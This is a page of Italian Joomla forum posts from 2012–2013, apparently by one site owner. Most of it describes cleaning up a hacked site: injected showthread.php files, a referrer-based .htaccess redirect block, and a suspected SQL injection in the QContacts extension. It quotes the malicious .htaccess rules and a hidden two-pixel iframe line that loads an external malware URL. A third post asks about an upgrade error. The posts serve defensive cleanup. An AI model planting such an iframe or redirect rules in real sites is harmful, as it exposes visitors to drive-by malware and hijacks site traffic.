Post

1

Sicurezza / Re:REDIRECT TO met-a-morph [HACKED JOOMLA BY SQLINJECTION THROUGH QCONTACTS]

« il: 16 Gen 2013, 12:39:17 »

Ciao,
si pare che alla fine ho risolto!

Il problema credo sia stato dovuto ad un estensione che avevo installata e che si chiama QContacts, per la gestione dei contatti. Controlla subito se è presente nel tuo joomla!
Pare che sia affetta da un problema di attacco chiamato SQL Injection.

Quello che ho fatto io è eliminare tutti gli showthread.php presenti nel mio server remoto e eliminare anche tutti gli htaccess.txt (tranne quello principale presente nella cartella di root, il quale va modificato controllando che non ci siano righe di codice sospette.. in particolare le prime righe racchiuse nel target:

Codice: [Seleziona]

<IfModule mod_rewrite.c>
Inoltre devi controllare tutti i file INDEX.HTML e tutti i file con estensione .JS e .PHP prensenti nel tuo server !

Lo so è un lavoraccio ed è una pazzia ... io ci ho perso una nottata però alla fine in questo modo ho risolto.
Perchè controllare tutti questi file?
Perchè lo script malevolo è andato ad aggiungere delle righe di codice dannose in quasi tutti i file javascript (.js) , php (.php) , e html (in particolare gli index.html)

Quindi dovresti armarti di tanta tanta pazienza e controllare manualmente uno ad uno tutti questi file e NOTERAI CHE QUASI SEMPRE O ALL'INIZIO O ALLA FINE DEL FILE CI SONO DUE RIGHE DI CODICE SEMPRE UGUALI E DANNOSE! contenenti righe simili a questa:

Codice: [Seleziona]

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://micasafoundation.org/showthread.php?sid=46154></iframe></body>

Dopo di che è importante aggiornare tutte le estensioni installate, eliminandone alcune eventualmente inutilizzate e controllare di avere l'utlima versione di joomla installata.. Questo non significa che devi avere necessariamente la 3.x e nemmeno la 2.x
Puoi benissimo avere la 1.5.x però in questo caso devi avere l'utlima e cioè la 1.5.26

A questo punto se hai qcontacts devi IMMEDIATAMENTE SOSTITUIRLO.
Grazie a Dio c'è qualcuno che ha scoperto la sua falla e si è messo a lavorare per correggere il problema. Pare che ci sia riuscito.
Questa persona ha reso disponibile il nuovo pacchetto il quale non è pià vulnerabile.
E' scaricabile dal seguente link:
http://forum.joomla.org/viewtopic.php?t=685243
(dal secondo post in particolare..)

Adesso il mio sito pare sia tornato "sano", anche se conto al più presto di installare una nuovissima installazione di joomla per evitare qualsiasi altro problema dando una rinfrescata completa al mio sito.

Spero di esserti stato di aiuto [/code]

2

Sicurezza / REDIRECT TO met-a-morph by showthread.php [HACKED JOOMLA 1.5.26]

« il: 10 Set 2012, 17:11:28 »

Ciao a tutti!


Scrivo questo veloce topic sperando che risulti utile a qualcuno che come me si è trovato da un giorno all'altro il sito hackerato.


Il problema è che il sito è accessibile solamente in maniera diretta, ovvero digitando l'indirizzo completo nel browser tramite la barra degli indirizzi.
Anche accedendo al sito attraverso link diretti presenti ad esempio in pagine facebook tutto è funzionante come sempre.


Invece se si prova ad accedere al sito da un qualsiasi motore di ricerca, come google ad esempio, il sito non è visibile!
Quello che si visualizza è una pagina totalmente bianca e nella barra degli indirizzi il seguente url:
*******


Non so come hanno fatto questi maledetti so solo che mi hanno fatto perdere mezza giornata e che molte persone mi hanno (per fortuna) contattato per dirmi che il mio sito era down. [figuraccia]




Qui vi elenco in maniera concisa tutto ciò che ho fatto per riportare il mio sito a lavorare alla perfezione:


1) Cambiare tutte le password e tutti gli username di accesso a qualsiasi cosa sia collegata al mio sito.
Esempi: email, pannello di controllo del hosting, joomla, FTP, phpmyadmin, ecc ecc ... !!!


2) Mettere il sito offiline


3) Connettersi al sito in ftp tramite filezilla e usare la funzione: Server -> Search Remote Files ...


4) Cercare il file:  showthread.php


5) Eliminare TUTTI I FILE TROVATI


6) Modificare il file .htaccess presente nella root directory eliminado tutte le righe racchiuse nel target:
  <IfModule mod_rewrite.c>


7) Rimettere online il sito web




Il virus sembra essere composto da due file:
showthread.php     e    .htaccess


che si propagano in svariate cartelle per essere raggiungibili in vari modi e quindi difficilmente eliminabili.
Nel primo ci sono le direttive da effetuare e nel secondo la redirect da aggiungere al sito.


Io avevo circa 70 files showthread.php !!!!!!




Eliminate se volete anche tutti gli .htaccess  tranne naturalmente quello vostro principale che si trova nella ROOT DIRECTORY!


Quello dovete modificarlo eliminando le prime righe che hanno questa forma:



<IfModule mod_rewrite.c>


   RewriteEngine On
   RewriteBase /


   RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
   RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
   RewriteRule ^.*$ ******** [L,R]


</IfModule>




Per adesso, non avendo tempo, questi sono i passi che ho effettuato sul mio dominio per ripristinarlo.
Adesso tutto sembra essere tornato alla perfezione.


Il problema è che non ho capito la natura di questo attacco. Cioè come è stato eseguito.


Se è un problema della versione di joomla che ho e cioè la 1.5.26  oppure se è dovuto a qualche componente che ho installato o plugin che presenta qualche falla...


Per evitare che ciò avvenga di nuvo al più presto effettuerò una migrazione all'utlima versione stabile di joomla e riaggiornerò tutti i vari componenti e plugin.


Vi consiglio vivamente di fare lo stesso


Buona fortuna! 




EDIT: Ho notato che al ripristino del mio sito tutto funzionava come prima tranne un componente .. ovvero


Exposè 4 -


è un componente che utilizzavo per mostrare una gallery di fotografie ..
credo che la falla sia dovuta a lui ...
e lavorandoci sopra vedo che cerca di connettersi ad un url del tipo:


******


Al più presto provvederò ad eliminarlo dal mio sito e a trovare un buon sostituto.


Se ci sono persone che ne sanno più di me per favore si facessero sentire!!!


Grazie a tutti!
 
Edit: Rimossi link malevoli.

3

Installazione, migrazione e aggiornamento / ERRORE 500 - Problema dopo migrazione a 2.5.4

« il: 19 Apr 2012, 03:32:08 »

Ciao ragazzi ho un problema che proprio non riesco a risolvere e ve ne sarei grato se provaste ad aiutarmi


Ho appena effettuato l'aggiornamento di joomla dalla versione 1.5.26 alla 2.5.4 (ITA_STABLE) utilizzando la procedura descritta nel wiki di joomla e quindi usando Jupgrade.


Jupgrade sembra aver fatto tutto correttamente, in quanto mi ha dato il messaggio di installazione completata con successo!
anche se ora che ci penso, in basso c'era un piccolo output di debug di uno o due errori relativi a qualche tabella del database sql ... :/


L'installazione l'ho fatta in un'altra cartella lasciando intatto quindi il vecchio joomla 1.5.26 nella root.


ADESSO LA SITUAZIONE ATTUALE E' QUESTA:


Posso accedere tranquillamente alla root del mio sito utilizzando quindi joomla 1.5.26 sia in front-end che in back-end e tutto è normale e funzionante...


Invece quando mi collego a: www.miosito.it/jupgrade:
- dal front-end vedo il mio sito (anche se con un template che non è quello che usavo prima e con alcuni componenti che danno errori ... )
- dal back-end invece riesco a fare il login però subito ricevo questo maledetto errore che non riesco proprio a risolvere e che non mi fa accedere al mio pannello di controllo !!!


Vi posto l'errore:
500 - Si è verificato un errore. Table 'nomemiodatabase.j25_languages' doesn't exist SQL=SELECT a.id, a.title, a.checked_out, a.checked_out_time,  a.created, a.hits,l.title AS language_title,uc.name AS editor,ag.title AS access_level,c.title AS category_title,ua.name AS author_name FROM j25_content AS a LEFT JOIN `j25_languages` AS l ON l.lang_code = a.language LEFT JOIN j25_users AS uc ON uc.id=a.checked_out LEFT JOIN j25_viewlevels AS ag ON ag.id = a.access LEFT JOIN j25_categories AS c ON c.id = a.catid LEFT JOIN j25_users AS ua ON ua.id = a.created_by ORDER BY a.hits DESC LIMIT 0, 5
[size=78%]---------------------[/size]
Qualcuno sa dirmi dove potrebbe essere il problema?
Forse perchè ho fatto l'installazione senza preoccuparmi di controllare se tutte le mie estensioni effettivamente sopportassero joomla 2.5.4
Aspetto ansiosamente una risposta ...
Grazie anticipatamente a tutti!!